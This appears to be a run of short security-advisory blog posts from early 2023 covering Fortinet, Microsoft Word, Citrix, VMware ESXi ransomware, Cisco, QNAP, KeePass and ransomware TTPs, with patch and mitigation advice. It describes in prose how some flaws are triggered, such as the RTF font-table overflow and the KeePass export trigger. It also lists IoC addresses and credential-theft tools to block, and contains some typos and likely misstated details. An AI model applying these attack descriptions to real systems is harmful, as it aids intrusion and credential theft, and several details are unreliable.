https://www.helpnetsecurity.com/2023/03/14/cve-2023-23397-cve-2023-24880/

Overview

Fortinet warns of a new critical buffer underwrite vulnerability that affects FortiOS and FortiProxy. Tracked as CVE-2023-25610, this vulnerability allows an unauthenticated attacker to execute an arbitrary code or denial of service attack on the graphic user interface of the device. However, the vulnerability was uncovered internally while reviewing and testing the security of the company’s products. As such, Fortinet is unaware of the flaw being exploited in the wild.

This Flaw Affects Multiple Devices, Including:

  • FortiOS version 7.2.0 through 7.2.3,
  • FortiOS version 7.0.0 through 7.0.9,
  • FortiOS version 6.4.0 through 6.4.11,
  • FortiOS version 6.2.0. through 6.2.12, and
  • FortiOS 6.0 – all versions.
  • FortiProxy version 7.2.0 through 7.2.2.
  • FortiProxy version 7.0.0 through 7.0.8,
  • FortiProxy version 2.0.0 through 2.0.11,
  • FortiProxy 1.2 – all versions, and finally,
  • FortiProxy 1.1 – all versions

Additionally, it is important to know that some hardware devices running an affected version of FortiOS are only impacted by the denial of service issue.

If users cannot update their devices, Fortinet has a workaround. The company suggests disabling the HTTP/HTTPS administrative interface or limiting the IP addresses that can remotely access it straight away.

However, if possible, you should update your current version if it is listed above as vulnerable.

Fortinet Recommends the Following Mitigations to Eliminate the Risk of this Vulnerability:

  • FortiOS version 7.4.0 or above,
  • FortiOS version 7.2.4 or above,
  • FortiOS 7.0.10 or above,
  • FortiOS 6.4.12 or above,
  • FortiOS 6.2.13 or above,
  • FortiProxy version 7.2.3 or above
  • FortiProxy 7.0.9 or above,
  • FortiProxy 2.0.12 or above,
  • FortiOS-6K7K version 7.0.10 or above,
  • FortiOS-6K7K version 6.4.12 or above, and lastly,
  • FortiOS-6K7K version 6.2.13 or above.

In conclusion, staying current on patches and regularly checking for updates is important to ensure your devices and organization are not exposed to vulnerabilities. With this in mind, see the security updates below for more information on FortiOS and FortiProxy versions.

Sources

https://www.fortiguard.com/psirt/FG-IR-23-001 – FortiGuard Security Update
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-unauthenticated-rce-vulnerability/
https://www.helpnetsecurity.com/2023/03/09/cve-2023-25610/

Overview

On February 14th, 2023, Microsoft released a security advisory for Microsoft Word regarding a critical remote code execution (RCE) vulnerability. The vulnerability, CVE-2023-21716, was released as a critical severity and deemed “less likely” to be exploited with no Proof of Concept (PoC) exploits attached. However, within the last few days, a PoC exploit for this CVE was released by a security researcher on Twitter.

The Security researcher, Joshua Drake, revealed that remote attackers could leverage the issue to execute code with the same privileges as the victim that opens the malicious .RTF document.

Adding to the concern, many methods exist to deliver the malicious file to victims—one of the easiest options being to attach it to an email in a phishing attempt. 

And, as Microsoft warns users, all it takes to trigger the compromise is to load the file in the Preview Pane. What happens is the Rich Text Format (RTF) parser in Word has a corruption vulnerability that activates when one interacts with the font table (*\fonttbl*) that contains an excessive number of fonts (*\f###*).

What You Can Do

Microsoft has released a few workarounds, the simplest of which requires users to apply the security update which Microsoft shared. Multiple versions of Office have been affected, and there are different instructions for each, including Office 2013, Office 2016, Office 2019, and Office 2021. You can find these at the first link listed below.

Another tip Microsoft recommends for users is to read emails in plain text format. Emails in this format do not include rich content such as pictures, specialized fonts, etc. Thus, this option inhibits users from opening email attachments or any associated malicious links. Reading emails in plain text format is typically not the default for email users and must be configured to read all standard mail in plain text. This Microsoft Knowledge Base Article 831607  guides how to read all standard mail in plain text. 

Another workaround is to enable the Microsoft Office File Block policy, which can stop any Office applications from opening RTF documents of unknown or untrusted origins. To do this, you would need to modify the Windows Registry, and if done incorrectly can cause even more problems to your device.

It is crucial to stay current on the latest exploits and update to the latest versions of software available to protect your devices, applications, and organization from vulnerabilities.

Sources

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21716 – Microsoft Updatehttps://nvd.nist.gov/vuln/detail/CVE-2023-21716 – NIST NVDhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21716 – CVE-2023-21716https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/

Overview

Chatbots are simulation applications that function as if you’re conversing with someone over the Internet. Many organizations use chatbots for customer support issues, and some chatbots are offered as services to help with art and creativity. As the popularity of these chatbots grows, so does the malicious intent of cyber criminals.

One popular chatbot that has been in the news for the past few weeks is ChatGPT. It was only launched at the end of November 2022 and is said to be a new generation of AI systems that can converse, generate readable text on demand, and produce images and videos based on a database of stored information.

However, there has been some backlash from many users facing issues or foreseeing them. Some of these problems encompass ChatGPT-enabled phishing attempts that lead to spam websites, increased plagiarism in the academic environment, and chatbot customer support options obtaining sensitive information.

The technology functions using a database to generate keywords and phrases towards a topic that can create a constant conversation or generate ideas to complete complex tasks.

Many organizations, such as financial and educational institutions, are restricting the use of ChatGPT because of the negative impacts that can result from overuse and abuse. In the school setting, the concern involves how this technology can undercut the education process. Students can ask ChatGPT to write them an essay, which the bot can complete in minutes. This is problematic because students are missing the opportunity to build critical thinking and problem-solving skills.

It’s also important to know that chatbots don’t just show up when you are looking for help; they can also reach out to you. These can be seen in phishing attempts looking for your personal information. The bots provide urgent warnings to grab your attention and deceive you into entering credentials or sensitive data readily available to the malicious hacker.

It may be hard to pinpoint the differences between an artificial intelligence conversation to a human conversation when you need its service, but there are a few things to keep an eye out for:

  • Look for the absence of compassion and a lack of experience.
  • Check for errors in the writing styles and inconsistency in wording.
  • Keep an eye out for filler words or repetitive phrases.
  • Don’t click on links unless they are directly from the secure website.
  • Do not share or enter credentials unless the messages are legitimate.



ChatGPT is not the first or last form of this type of AI that we will see. As these technologies emerge and develop, it is important to be vigilant of red flags before a simple request turns into a malicious event.

Sources

https://apnews.com/article/what-is-chat-gpt-ac4967a4fb41fda31c4d27f015e32660

https://www.nbcnews.com/tech/tech-news/new-york-city-public-schools-ban-chatgpt-devices-networks-rcna64446

Overview

Throughout the past week, Fortinet released numerous security advisories regarding the availability of patches for product vulnerabilities. These patch releases address critical flaws affecting ForiNAC and FortiWeb products. Two of the 40 advisories Fortinet released during the week have a ‘critical’ severity rating. Fifteen of those 40 are marked as having ‘high’ severity.

One of the critical advisories addresses CVE-2021-42756, a CVE identifier “assigned to multiple stack-based buffer overflow vulnerabilities in FortiWeb’s proxy daemon.” An unauthenticated, remote hacker can use arbitrary code on a targeted system using malicious HTTP requests if the security hole were compromised. Below are the different versions Fortinet has released as vulnerable, accepted, or fixed versions to which all devices should be updated.

FortiWeb Impacted Versions:

  • FortiWeb versions 5. x all versions
  • FortiWeb versions 6.0.7 and below
  • FortiWeb versions 6.1.2 and below
  • FortiWeb versions 6.2.6 and below
  • FortiWeb versions 6.3.16 and below
  • FortiWeb versions 6.4, all versions


FortiWeb Fixed Versions:

  • FortiWeb 7.0.0 or above
  • FortiWeb 6.3.17 or above
  • FortiWeb 6.2.7 or above
  • FortiWeb 6.1.3 or above
  • FortiWeb 6.0.8 or above



A second critical vulnerability, CVE-2023-39952, is an external file name or path control issue in FortiNAC. If compromised, an unauthenticated attacker can control a file name or path in FortiNAC’s keyUpload script, allowing arbitrary write on the vulnerable system.

FortiNAC Impacted Versions:

  • FortiNAC versions 9.4.0
  • FortiNAC versions 9.2.0 through 9.2.5
  • FortiNAC versions 9.1.0 through 9.1.7
  • FortiNAC 8.8, all versions
  • FortiNAC 8.6, all versions
  • FortiNAC 8.5, all versions
  • FortiNAC 8.3, all versions


FortiNAC Fixed Versions:

  • FortiNAC version 9.4.1 or above
  • FortiNAC version 9.2.6 or above
  • FortiNAC version 9.1.8 or above
  • FortiNAC version 7.2.0 or above



It is essential to ensure all affected devices above are appropriately patched, especially if they relate to critical and high vulnerabilities—however, other vulnerabilities released with a lower CVSS score still threaten your environment.

Sources

https://www.securityweek.com/fortinet-patches-critical-code-execution-vulnerabilities-in-fortinac-fortiweb/

https://www.fortiguard.com/psirt/FG-IR-22-300 – FortiNAC vulnerability

https://www.fortiguard.com/psirt/FG-IR-21-186 – FortiWeb Vulnerability

Overview

Citrix has released security updates for new vulnerabilities within their Citrix Workspace Apps and Virtual Apps and Desktops. If applicable, address the vulnerabilities immediately. Doing so will prevent users from exploiting these vulnerabilities and taking unauthorized control of devices and systems.

Updates for Known Vulnerabilities

  1. The first vulnerability is CVE-2023-24486 (labeled CTX477618 on the Citrix Support page). It exists within the Citrix Workspace app for Linux. If exploited, a malicious local user could gain access to the Citrix Virtual Apps and Desktops session of another user. The nonmalicious user must be using the same computer from which the ICA session is launched. This problem affects all supported versions of the Citrix Workspace app for Linux before 2302. For users affected, it is crucial to update the Citrix Workspace app for Linux 2302 and later as soon as possible.
  2. The next vulnerabilities are CVE-2023-24484 and CVE-2023-24485 (labeled CTX477617 on the Citrix Support page). Both allow a standard Windows user to perform operations as SYSTEM on a computer that runs the Citrix Workspace app. For users affected, it is essential to update the Citrix Workspace app for Windows to 1) Citrix Workspace App 2212 and later, 2) Citrix Workspace App 2203 LTSR CU2 and later cumulative updates, or 3) Citrix Workspace App 1912 LTSR CU7 Hotfix 2 (19.12.7002) and later cumulative updates.
  3. The final vulnerability in Citrix’s update is CVE-2023-24483 (labeled CTX477616 on Citrix’s Support page). This vulnerability allows a local user to use privilege escalation tactics to NT AUTHORITY\SYSTEM on Citrix Virtual Apps and Desktops Windows VDA. For users affected, it is vital to update your Citrix Virtual Apps and Desktops. Update to 1) Citrix Virtual Apps and Desktops 2212 and later versions, 2) Citrix Virtual Apps and Desktops 2203 LTSR CU2 and later cumulative updates, or 3) Citrix Virtual Apps and Desktops 912 LTSR CU6 and later cumulative updates.

It is always imperative to update to the latest version of your device or software. This is especially true if known vulnerabilities are reported.For more information on these vulnerabilities and the links to the updates, please visit the Citrix Support page listed in the sources below.

Sources

https://www.cisa.gov/uscert/ncas/current-activity/2023/02/14/citrix-releases-security-updates-workspace-apps-virtual-apps-and – CISA UpdateCTX477618 – https://support.citrix.com/article/CTX477618/citrix-workspace-app-for-linux-security-bulletin-for-cve202324486CTX477617 – https://support.citrix.com/article/CTX477617/citrix-workspace-app-for-windows-security-bulletin-for-cve202324484-cve202324485CTX477616 – https://support.citrix.com/article/CTX477616/citrix-virtual-apps-and-desktops-security-bulletin-for-cve202324483

Overview

The Cybersecurity Advisory (CSA) has collaborated on the #StopRansomware campaign which is responsible for publishing advisories for various ransomware threat actors worldwide. One major ransomware case that has come up again is the Tactics, Techniques, and Procedures (TTPs) and Indicators of Compromise (IoCs) of the DPRK, known as The Democratic People’s Republic of Korea, or the country of North Korea. These DPRK cyber actors are attempting to gain access to Healthcare and Public Health organizations by acquiring their records and taking over their systems with no intent to release them without payment in cryptocurrency.

Some distinguishable TTPs that have been traced to the ransomware attacks include:

  • Acquire Infrastructure – threat actors generate domains, personas, and accounts and identify cryptocurrency services to conduct ransomware operations.
  • Obfuscate Identity – threat actors will intentionally confuse and deny their abilities by infiltrating through a third-party affiliate to receive ransom payments.
  • Purchase VPNs and VPSs – Cyber actors will use Virtual Private Networks and Virtual Private Sectors to appear from other locations outside of the DPRK.
  • Gain Access – Actors will use CVEs to gain access and perform privileged escalation attacks on networks. Known CVEs related to the DPRK recent attacks are CVE-2021-44228, CVE-2021-20038, and CVE-2022-24990
  • Move Laterally and Discovery – Once in the network, threat actors use staged payloads with malware to download more files, execute shell commands, and more. This also gives them the opportunity to steal victim information and send it to the remote host under their control.
  • Employ Various Ransomware Tools – Threat actors have privately created ransomware, Maui and H0lyGh0st. They also have been observed using multiple encryption tools, and posing as other ransomware groups
  • Demand Ransom in Cryptocurrency – Threat actors have been leaving ransoms in bitcoin currency. This could be a one-on-one threat to a victim through an email or set to a healthcare organization, threatening to expose a company’s data to competitors if ransoms are not paid.

 

Mitigations

Since Healthcare and Public Health organizations have been the initial target, authoring agencies have advised all organizations to do some of the following:

  • Least privilege when it comes to accessing sensitive data, and implementing two-factor authentication and encryption.
  • Limit access to data by implementing a VPN with any network services.
  • Turn off any weak or unnecessary network device management interfaces, including Telnet, SSH, and HTTP for WAN’s and ensure they are secured with strong passwords and encryption.
  • Secure the collection and storage of any PII. This also includes processing PII internally and externally.
  • Implement monitoring tools to observe when IoT devices start to show signs of compromise

Separately, but still important, it is crucial to maintain backups of any data and regularly test these backups within your environment. A simple way to stop threat actors from infiltrating through devices or software is to regularly patch those systems. When a new update is released, or end-of-life is announced, it is important to install updates. See the updates on this ransomware attack from CISA for more ways to protect your organization, as well as examples for each of the TTP’s listed above.

Whether your organization is in the health sector or not, it is important to be aware and up to date on current ransomware attacks, their tactics, techniques, and procedures that could be floating around your environment.

Sources

https://www.cisa.gov/uscert/ncas/alerts/aa23-040a – CISA Updatehttps://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF – PDF for Sharinghttps://www.infosecurity-magazine.com/news/us-warns-critical-sectors-north/ – InfoSecurity updatehttps://www.cisa.gov/uscert/ncas/alerts/aa22-187a – July 2022 Update CISA

Overview

VMware released a security advisory on February 6th, 2023, about the ongoing attack of a vulnerability in ESXi’s OpenSLP service. This new ransomware campaign targets public-facing ESXi servers worldwide. The campaign is growing exponentially and there were approximately 3,000 victims as of the morning of Monday, Feb. 6th, 2023. The new malware variant, ESXiArgs, exploits a remote code execution vulnerability. It’s important to note that the malicious actors are leveraging a two-year-old vulnerability (CVE-2021-21974). This attack reveals the magnitude of how many servers have been left unpatched, along with the SLP service still running, and the OpenSLP port (427) still exposed, over the course of the past two years. CVE-2021-21974 affects the following systems:

ESXi Vulnerable Versions

Product

Vulnerable Versions

ESXi 7.0

All 7.0 versions prior to ESXi70U1c-17325551

ESXi 6.7

All 6.7 versions prior to ESXi670-202102401-SG

ESXi 6.5

All 6.5 versions prior to ESXi650-202102101-SG

ESXi Latest Versions

Product

Latest Version

ESXi 8.0

ESXi80a-20842819

ESXi 7.0

ESXi70U3si-20841705

ESXi 6.7

ESXi670-202210001

Once ESXiArgs gains access to a VMware ESXi server, ESXiArgs deploys the encrypt[.]sh to perform various tasks on the /tmp folder before running the encryption tool. OVHCloud confirmed that the adversary behind the attack exhibited the following characteristics:

  • Exploited CVE-2021-21974 for initial access.
  • Encrypted the victim’s files with the public key.
  • Targeted virtual machine files extensions such as (“.vmdk”, “.vmx”, “.vmxf”, “.vmsd”, “.vmsn”, “.vswp”, “.vmss”, “.nvram”,”*.vmem”)
  • Attempted to shut down the virtual machine VMX process to unlock files.
  • Created “argsfile” to store arguments passed to the encrypted binary.

Something to look out for is that ESXiArgs evades detection by deleting itself from the /store/packages/vmtools.py. Open-source news media noted that there were ransomware notes obtained and left behind, ESXiArgs appended the encrypted files with the “. args” file extension, including ransom[.]html and “How to Restore Your Files”[.]html.

Recommendations

If you have ESXi servers, below are recommendations to secure against the threat, as made available to us so far.

  1. Patch or upgrade your ESXi servers.
  2. Disable SLP Service if you are not able to patch immediately.
  3. Do not expose ESXi servers directly to the Internet.

If you have not been affected by this vulnerability, it is important to patch the server as soon as possible. You must also disable the SLP service, and make the servers unreachable from the internet.

Sources

https://www.vmware.com/security/advisories/VMSA-2022-0033.html – VMWare Advisoryhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974 – CVEhttps://www.helpnetsecurity.com/2023/02/06/vmware-esxi-ransomware-cve-2021-21974/https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/

Overview

Two new security vulnerabilities were discovered in Cisco products that are used throughout many organizations. Examples of these organization types include industrial factories, large enterprises, manufacturing centers, power grids, and data centers. These vulnerabilities grant attackers access to devices and the wide-ranging network. Devices that are affected include:

  •  800 Series Industrial ISRs
  • CGR1000 Compute Modules
  • IC3000 Industrial Compute Gateways
  • IOS XE-based devices configured with IOx
  • IR510 WPAN Industrial Routers
  • Cisco Catalyst Access points (COS-APs)

 

The first of the two is not identified as a CVE yet but is tracked as Cisco bug ID CSCwc67015. It is an Arbitrary File Write vulnerability found in the application hosting environment. This bug has the potential to allow hackers to remotely execute their own code and overwrite the files on the device. It arises in the application’s environment through a feature that enables users to upload and then run the applications in virtual containers. However, when reverse engineering came into play, researchers found a maliciously packed application can detour through a security check and decompress through the uploaded application. The security check was in place to protect a previous vulnerability, CVE-2007-4559. Since attention was brought to Cisco, the code will go live with a fix.

The second vulnerability, CVE-2023-20076, is more dangerous as it is a remote command injection vulnerability found in the application hosting component. Essentially, it allows administrators to deploy application containers or virtual machines directly onto the Cisco device. This is the result of unsuitable sanitization of the DHCP Client ID option which gives the attacker the ability to inject an operation system command. As of now, there are no workarounds for this vulnerability. However, keep in mind, both issues require the attacker to have authenticated and obtained admin privileges, which limits the severity, but it is not uncommon for credentials to be stolen if not properly secured.

Sources

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-8whGn5dL – Cisco Website with Vulnerability CVE-2023-20076https://www.darkreading.com/ics-ot/command-injection-bug-cisco-industrial-gear-devices-complete-takeoverhttps://www.computerweekly.com/news/365530036/Cisco-fixes-two-bugs-that-could-have-led-to-supply-chain-attacks-on-usershttps://www.trellix.com/en-us/about/newsroom/stories/research/when-pwning-cisco-persistence-is-key-when-pwning-supply-chain-cisco-is-key.html

Overview

QNAP Systems Inc. has brought attention to a new critical vulnerability (CVE-2022-27596) that allows remote attackers to inject malicious code on certain QNAP network-attached storage (NAS) devices. QNAP itself has classified this bug with a CVSS base score of 9.8/10 and claimed it can be abused in low-complexity attacks by malicious actors.

The affected devices running QTS 5.0.1 and QuTS hero h5.0.1 should upgrade immediately to QTS 5.0.1.2234 build 20221201 or later and QuTS hero h5.0.1.2248 build 20221215 or later, respectively, to secure the devices from any malicious attacks.

Steps to perform the update include:

  1. Log into the device as the admin user.
  2. Go to “Control Panel” > “System” > “Firmware Update.”
  3. Under the “Live Update” section, click the “Check for Update” option.
  4. Wait for the download and installation to complete.

Alternatively, QNAP device users can access and download the update from the Download Center (qnap.com/en/downloads) and enter their device details to manually apply the upgrade. It is important to update to the latest available software version as soon as possible since QNAP NAS devices have been a known target for ransomware attacks.

Sources

https://www.qnap.com/en-us/security-advisory/qsa-23-01 – QNAP Security Update

https://www.qnap.com/en/download – Download Center for QNAP

https://www.bleepingcomputer.com/news/security/qnap-fixes-critical-bug-letting-hackers-inject-malicious-code/

https://www.bleepingcomputer.com/news/security/over-29-000-qnap-devices-vulnerable-to-code-injection-attacks/ 

Overview

The open-source password management software KeePass has been linked to a newly found vulnerability, CVE-2023-24055. KeePass allows you to manage your passwords using a database that is locally stored on your device, compared to most password managers which store credentials in the cloud. KeePass is an encrypted database that requires a master password in order to access the credentials stored within.

This vulnerability allows an attacker with write access to the XML configuration file to obtain the cleartext passwords by adding an export trigger for any version of KeePass through 2.53 (in a default installation). When the changes are made to the XML file, the process automatically starts and transpires in the background. It exports the usernames, passwords, and any other information stored within into an unencrypted plaintext file. The user is not notified that a file containing their stolen credentials has been exported.

KeePass has disputed the claims of this vulnerability, saying that anyone who has write access to a device can also access the password database using other and maybe simpler methods. This could be using a keylogger to view the master password in KeePass, which for some can be easier than altering the XML file. The developers at KeePass have also stated “keeping the environment security (by using an anti-virus software, a firewall, and not opening unknown email attachments, etc.) KeePass cannot magically run securely in an insecure environment”.

There are a few options to maintain a secure password manager with KeePass, despite their efforts to fix this vulnerability. You can create an enforced configuration file following the steps in the link here, or found below. Another possibility is to ensure users don’t have write access to any files or folders within your KeePass, and that the KeePass .exe file and the configuration file are in the same folder.

Sources

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055 – Mitre CVE-2023-24055https://keepass.info/help/kb/config_enf.html – Enforced Configuration Stepshttps://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/https://www.digitaltrends.com/computing/keepass-password-manager-exploit-no-fix/

Overview

On January 24, 2023, the Cyber Security and Infrastructure Security Agency (CISA) released a report called “Partnering to Safeguard K-12 Organizations from Cybersecurity Threats,” for K-12 institutions to help protect them against cybersecurity threats. Alongside the report, CISA shared a toolkit containing recommendations and resources for building, operating, and maintaining a safe and protected environment for staff, students, and parents.

With the increase in technology and network advances in K-12 schools, there has been an increase in malicious cyber actors and threats targeting these organizations. The U.S. Congress has been aware of these risks and created the K-12 Cybersecurity Act of 2021, known as “The Act”, which brought CISA on to study, develop, and report on any cyber risk that could fall into the elementary and secondary school environment. As a result of CISA’s involvement, the organization released its mandated report with insight into any current threats to K-12 schools and the steps to prevent and mitigate against any future cyber-attacks.

The report’s findings emphasize the importance of deploying multifactor authentication (MFA), mitigating any known vulnerabilities (patching), testing backups, and implementing a cybersecurity training program. Further down the road, this can lead to a strong cyber security plan that also correlates with the NIST Cybersecurity Framework (CSF).

CISA released a Digital Online Toolkit to provide resources and materials for K-12 schools to implement within their environment. The toolkit is available for download and includes three recommendations for building a strong cybersecurity team.

  1. Invest in the most impactful security measures and build toward a mature cybersecurity team
  2. Recognize and actively address resource constraints
  3. Focus on collaboration and information sharing


CISA’s K-12 Report Emphasizes the Importance of the Following Security Practices:

  • Deploying multifactor authentication (MFA)
  • Mitigating any known vulnerabilities within the environment (patching)
  • Establishing and testing backups regularly
  • Develop and execute an Incident Response Plan periodically
  • Creating a strong cybersecurity training program
  • Prioritizing investments in alignment with the full list of CISA’s CPGs, and
  • Developing a unique cybersecurity plan that leverages the NIST CSF CISA ensures these small steps will quickly reduce the malicious cyber threats and vulnerabilities that can infiltrate the educational environment.



CISA also exclaims a strong partnership between K-12 Education, FBI regional cybersecurity personnel, and themselves, will be resourceful for future updates on this topic.

Sources

https://www.congress.gov/bill/117th-congress/senate-bill/1917 – “The Act”
https://www.cisa.gov/sites/default/files/publications/K-12report-24Jan23.pdf – Report PDF
https://www.cisa.gov/partnering-safeguard-k-12-toolkit – The Online Toolkit (download)
https://www.cisa.gov/protecting-our-future-partnering-safeguard-k-12-organizations-cybersecurity-threats – Partnership Announcement

Overview

Apple released new security updates corresponding to vulnerabilities found in various products on January 23rd, 2023. Any device with a vulnerability is at risk of an attacker gaining access.

Those devices include Safari 16.3, iOS 12.5.7, macOS Monterey 12.6.3, macOS Big Sue 11.7.3, watchOS 9.3, iOS 15.7.3, iPadOS 15.7.3, iOS 16.3, iPad 16.3, and macOS Ventura 13.2.By launching the new update released on January 23rd, you can mitigate the vulnerabilities if you are the owner of one or more of the devices listed.

Sources

https://www.cisa.gov/uscert/ncas/current-activity/2023/01/24/apple-releases-security-updates-multiple-products

https://support.apple.com/en-us/HT201222

Overview

MedusaLocker has been using new techniques and tactics of ransomware by targeting any unpatched VPNs for initial access. This is done using the scheduled task “svhost” to encrypt machines and injecting into system processes such as spoolsv.exe and svchost.exe. Commands are run and controls to parts 80, 445, and 2222. MedusaLocker has also been found using TeleLinkSoftHelper’s Employee Monitoring software, and the Pictures and Videos folders on a computer to stage malicious including Nmap, Mimikatz, Netscan, Netpass, and more.Indicators of Compromise (IoCs) include 64.190.63[.]111 and 194.165.17[.]15.Ways to mitigate MedusaLocker include ensuring any VPN appliances are fully patched, blocking the IoC Ips above in your firewall, implementing least privilege for local and domain users, auditing current users to confirm admin rights have not been given to nonrequired users, blocking the listed file names in your antivirus (AV)/EDR solution, adopting MFA for users connecting through VPN, and auditing and removing legacy or unneeded users that have access to VPN. (Blackpoint Cyber Cyber Threat Notice, personal communication, January 23, 2023)

Sources

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

 

Overview

There are new vulnerabilities discovered on Zoho ManageEngine products related to CVE-2022-47966, which allow for unauthenticated RCE – Remote Code Execution. This is the effect of an outdated Apache Santuario version. Those affected are at risk if a SAML-based Single Sign-On is enabled, or has been enabled at some point. To mitigate this, it is important to patch to the latest version for all devices affected, as stated in the Security Advisory from Zoho ManageEngine below.

Services

https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html – ManageEngine Security Advisory

https://nvd.nist.gov/vuln/detail/CVE-2022-47966 – NIST CVE-2022-47966

https://www.csoonline.com/article/3685940/attackers-exploiting-critical-flaw-in-many-zoho-manageengine-products.html

Overview

The National Institute of Standards and Technology (NIST) has released the “Cybersecurity Framework 2.0 Concept Paper: Potential Significant Updates to the Cybersecurity Framework,” outlining considered changes to the Cybersecurity Framework (CSF).

The CSF is meant to be a living document that is developed over time. Its purpose is to guide organizations to better understand, manage, reduce, and communicate cybersecurity risks. The evolving nature of the CSF is upheld to keep pace with changing technology and threat trends, adopt lessons learned, and shift common practices to best practices. In turn, the Framework can continue to help organizations effectively manage risk in the ever-changing cybersecurity landscape.

While the framework is a voluntary guide, it is widely used by all sectors around the globe.

The development of the CSF is based heavily on private and public sector input. As such, NIST welcomes public responses to the concept paper to improve the Framework’s effectiveness and better align it with other cybersecurity resources. The organization asks the community to provide feedback by March 3, 2023.

Public involvement has already played a significant role in the process. According to NIST, the concept paper was based on feedback received so far through:

  • Responses to the February 2022 NIST Cybersecurity Request for Information (RFI);
  • A workshop held in August of 2022 attended by nearly 4,000 participants from 100 countries;
  • Feedback received from organizations who’ve used the CSF; and
  • NIST participation at events and meetings around the world.



One notable change proposed in the paper is to expand the Framework’s scope to be more inclusive to organizations beyond critical infrastructure. This means more guidance for organizations like small businesses and educational institutions.

Throughout the process, NIST will pursue stakeholder feedback in other ways through publically held webinars and workshops.

The original CSF 2.0 timeline documented in the concept paper indicates NIST’s goal to have CSF 2.0 ready in the winter of 2024.

Sources

https://www.nist.gov/cyberframework/updating-nist-cybersecurity-framework-journey-csf-20

https://fedscoop.com/nist-working-on-potential-significant-updates-to-cybersecurity-framework/

https://www.nist.gov/system/files/documents/2023/01/19/CSF_2.0_Concept_Paper_01-18-23.pdf

https://www.federalregister.gov/documents/2022/02/22/2022-03642/evaluating-and-improving-nist-cybersecurity-resources-the-cybersecurity-framework-and-cybersecurity

Overview

The Rhadamanthys Stealer is a malvertising campaign, spreading across the internet via Google Ads which redirect users to trojanized versions of installers for many popular software packages (ex from alert: Zoom, AnyDesk, BlueStacks, Notepad++, and Adobe Acrobat.) this malware is a “stealer” type of malware, developed to steal targeted files, system info, cookies, history, autofill’s, passwords, 2FA and password managers, VPNs, Mail Clients and more.The malware utilizes AES 256-bit encryption to communicate with its command and control. There are Indicators of Compromise (IOC) available.

 

Sources

https://socprime.com/blog/rhadamanthys-malware-detection-new-infostealer-spread-via-google-ads-spam-emails-to-target-crypto-wallets-and-dump-sensitive-information/

https://www.pcrisk.com/removal-guides/25643-rhadamanthys-stealer

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon

Overview

Fortinet published critical advisory FG-IR-22-398 / CVE-2022-42475 on Dec 12, 2022. The advisory has since been updated. On January 11, 2023, the company issued a write-up detailing its initial investigation into the malware and additional IoCs found during their ongoing analysis. The exploit has been seen in the wild and its CVSS is now 9.8. This vulnerability is considered critical.While reports indicate attackers are using this exploit to attack large organizations and Government agencies, SMBs should take the time to fix this flaw while they can, and before these attackers turn their sights on smaller organizations.The complexity of this exploit indicates the attackers have an advanced capability, possibly even state-sponsored.There are patches available at Fortiguard.com:

FortiOS version 7.2.0 through 7.2.2FortiOS version 7.0.0 through 7.0.8FortiOS version 6.4.0 through 6.4.10FortiOS version 6.2.0 through 6.2.11FortiOS-6K7K version 7.0.0 through 7.0.7FortiOS-6K7K version 6.4.0 through 6.4.9FortiOS-6K7K version 6.2.0 through 6.2.11FortiOS-6K7K version 6.0.0 through 6.0.14

Sources

https://www.fortinet.com/blog/psirt-blogs/analysis-of-fg-ir-22-398-fortios-heap-based-buffer-overflow-in-sslvpnd

https://nvd.nist.gov/vuln/detail/CVE-2022-42475

https://vulcan.io/blog/how-to-fix-cve-2022-42475/

Overview

On January 11, 2023, Cisco security published an advisory for multiple vulnerabilities in the web-based management interface that exists in some of their SMB routers. These vulnerabilities could allow authentication bypass (identified as CVE-2023-20025, CVE-2023-20026, and CVE-2023-20045). These vulnerabilities are critical and have been assigned a critical CVSS score of 9.0. The vulnerability impacts the following Cisco RV Series small business routers: RV016 Multi-WAN VPN Routers RV042 Dual WAN VPN Routers RV042G Dual Gigabit WAN VPN Routers RV082 Dual WAN VPN Routers. According to Cisco, a successful exploit could allow the attacker to bypass authentication and gain root access to the underlying operating system. Cisco has not released software updates to address the vulnerabilities at this time and has declared no intention of patching these flaws. There are no workarounds that address these vulnerabilities, meaning security teams should be on alert and watch these devices carefully. While not an authorized Cisco workaround, disabling remote management and blocking access to ports 443 and 60443 is a workaround that prevents exploitation of the flaws. Cisco ended support for the RV082 and RV016 in 2021, and software maintenance ended for the RV042 and RV042G in the same year – but the hardware will be supported until 2025.

Sources

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbr042-multi-vuln-ej76Pke5

https://siliconangle.com/2023/01/11/cisco-warns-customers-critical-vulnerabilities-small-business-routers/

https://www.theregister.com/AMP/2023/01/13/cisco_smb_critical_router_flaw_no_fix/

Overview

Flipper Zero is a portable electronic multi-functional pen-testing tool that came out in 2020. It combines hardware tools for hacking with custom, open-source software, that aids in hacking or intercepting numerous wireless signals. The device is capable of cloning ID and Access Cards, radios, keyless entry systems, Internet of Things (IoT) sensors, garage doors, near-field communication (NFC) cards, and other wireless devices that communicate using short-range signals. The tool is being used by cybersecurity professionals, Hackers, and Criminals to compromise networks and it has been seen in the wild during active attacks.

Sources

https://docs.flipperzero.one/ https://www.zdnet.com/article/flipper-zero-geeky-toy-or-serious-security-tool/ https://www.bleepingcomputer.com/news/security/ongoing-flipper-zero-phishing-attacks-target-infosec-community/ https://www.infosecurity-magazine.com/news/phishing-campaign-uses-flipper-zero/ https://www.wired.com/story/what-is-flipper-zero-tiktok/

Overview

